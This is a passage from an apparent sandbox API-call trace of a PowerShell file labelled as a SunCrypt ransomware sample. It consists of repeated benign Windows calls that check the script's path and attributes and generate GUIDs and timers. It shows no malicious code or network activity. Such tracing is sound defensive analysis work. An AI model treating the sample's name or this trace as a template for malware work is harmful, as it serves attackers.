nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 
0x3b [0104.070] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.071] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701688762775) returned 1 [0104.071] EtwEventActivityIdControl () returned 0x0 [0104.071] EtwEventActivityIdControl () returned 0x0 [0104.071] EtwEventActivityIdControl () returned 0x0 [0104.071] EtwEventActivityIdControl () returned 0x0 [0104.071] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xdf86b848, Data2=0xfaa0, Data3=0x4f23, Data4=([0]=0xb6, [1]=0xa6, [2]=0x9e, [3]=0xa2, [4]=0x39, [5]=0x3d, [6]=0xc2, [7]=0x23))) returned 0x0 [0104.072] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.072] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701688873421) returned 1 [0104.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.072] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.072] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.073] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.074] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701689031416) returned 1 [0104.074] EtwEventActivityIdControl () returned 0x0 [0104.074] EtwEventActivityIdControl () returned 0x0 [0104.074] EtwEventActivityIdControl () returned 0x0 [0104.074] EtwEventActivityIdControl () returned 0x0 [0104.074] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc92e138a, Data2=0xea75, Data3=0x493d, Data4=([0]=0x9a, [1]=0x53, [2]=0x7f, [3]=0x2f, [4]=0xb1, [5]=0x48, [6]=0x1e, [7]=0x89))) returned 0x0 [0104.075] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.075] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701689141766) returned 1 [0104.075] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.075] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.075] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.075] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.075] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.075] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.076] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701689296162) returned 1 [0104.076] EtwEventActivityIdControl () returned 0x0 [0104.077] EtwEventActivityIdControl () returned 0x0 [0104.077] EtwEventActivityIdControl () returned 0x0 [0104.077] EtwEventActivityIdControl () returned 0x0 [0104.077] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xd7c8370a, Data2=0xa085, Data3=0x4e20, Data4=([0]=0xa5, [1]=0x50, [2]=0x9e, [3]=0x2e, 
[4]=0x2f, [5]=0x88, [6]=0x25, [7]=0xa9))) returned 0x0 [0104.077] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.077] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701689406294) returned 1 [0104.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.079] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701689560897) returned 1 [0104.079] EtwEventActivityIdControl () returned 0x0 [0104.079] EtwEventActivityIdControl () returned 0x0 [0104.079] EtwEventActivityIdControl () returned 0x0 [0104.079] EtwEventActivityIdControl () returned 0x0 [0104.079] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7c5a9a0e, Data2=0xa982, Data3=0x4d79, Data4=([0]=0x9d, [1]=0x50, [2]=0x1c, [3]=0xfe, [4]=0x1f, [5]=0x55, [6]=0x2f, [7]=0x9b))) returned 0x0 [0104.080] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.080] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701689678339) returned 1 [0104.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.080] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, 
ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.104] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701692080147) returned 1 [0104.104] EtwEventActivityIdControl () returned 0x0 [0104.104] EtwEventActivityIdControl () returned 0x0 [0104.104] EtwEventActivityIdControl () returned 0x0 [0104.105] EtwEventActivityIdControl () returned 0x0 [0104.105] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xd3033b34, Data2=0x3c7c, Data3=0x4ea3, Data4=([0]=0xbf, [1]=0xc1, [2]=0xa5, [3]=0x47, [4]=0x37, [5]=0x8a, [6]=0x67, [7]=0x42))) returned 0x0 [0104.105] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.105] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701692207108) returned 1 [0104.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
lpFilePart=0x0) returned 0x3a [0104.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.106] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.114] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701693071203) returned 1 [0104.114] EtwEventActivityIdControl () returned 0x0 [0104.114] EtwEventActivityIdControl () returned 0x0 [0104.114] EtwEventActivityIdControl () returned 0x0 [0104.115] EtwEventActivityIdControl () returned 0x0 [0104.115] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2f5b1434, Data2=0x1c80, Data3=0x4379, Data4=([0]=0xbb, [1]=0xa3, [2]=0x95, [3]=0xf5, [4]=0x40, [5]=0x47, [6]=0xfa, [7]=0x4c))) returned 0x0 [0104.115] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.115] 
QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701693193707) returned 1 [0104.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.116] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.118] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701693465767) returned 1 [0104.118] 
EtwEventActivityIdControl () returned 0x0 [0104.118] EtwEventActivityIdControl () returned 0x0 [0104.118] EtwEventActivityIdControl () returned 0x0 [0104.118] EtwEventActivityIdControl () returned 0x0 [0104.118] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbef67e67, Data2=0x7615, Data3=0x4d01, Data4=([0]=0xb3, [1]=0xf0, [2]=0xab, [3]=0x65, [4]=0xe7, [5]=0x90, [6]=0xc8, [7]=0xb5))) returned 0x0 [0104.119] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.119] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701693597157) returned 1 [0104.119] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.120] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.120] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.122] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701693852155) returned 1 [0104.122] EtwEventActivityIdControl () returned 0x0 [0104.122] EtwEventActivityIdControl () returned 0x0 [0104.122] EtwEventActivityIdControl () returned 0x0 [0104.122] EtwEventActivityIdControl () returned 0x0 [0104.122] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x684aeeaa, Data2=0xe226, Data3=0x4633, Data4=([0]=0xad, [1]=0x10, [2]=0x66, [3]=0xb3, [4]=0xa6, [5]=0xce, [6]=0xfa, [7]=0x1a))) returned 0x0 [0104.123] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.123] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701693980755) returned 1 [0104.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.123] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: 
"c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.125] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701694157940) returned 1 [0104.125] EtwEventActivityIdControl () returned 0x0 [0104.125] EtwEventActivityIdControl () returned 0x0 [0104.125] EtwEventActivityIdControl () returned 0x0 [0104.125] EtwEventActivityIdControl () returned 0x0 [0104.125] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x57a11451, Data2=0xe204, Data3=0x4672, Data4=([0]=0xba, [1]=0x76, [2]=0x84, [3]=0xd9, [4]=0xb3, [5]=0xb3, [6]=0x41, [7]=0x46))) returned 0x0 [0104.126] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.126] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701694282719) returned 1 [0104.126] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", 
nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.127] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.133] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701694926048) returned 1 [0104.133] EtwEventActivityIdControl () returned 0x0 [0104.133] EtwEventActivityIdControl () returned 0x0 [0104.133] EtwEventActivityIdControl () returned 0x0 [0104.133] EtwEventActivityIdControl () returned 0x0 [0104.133] 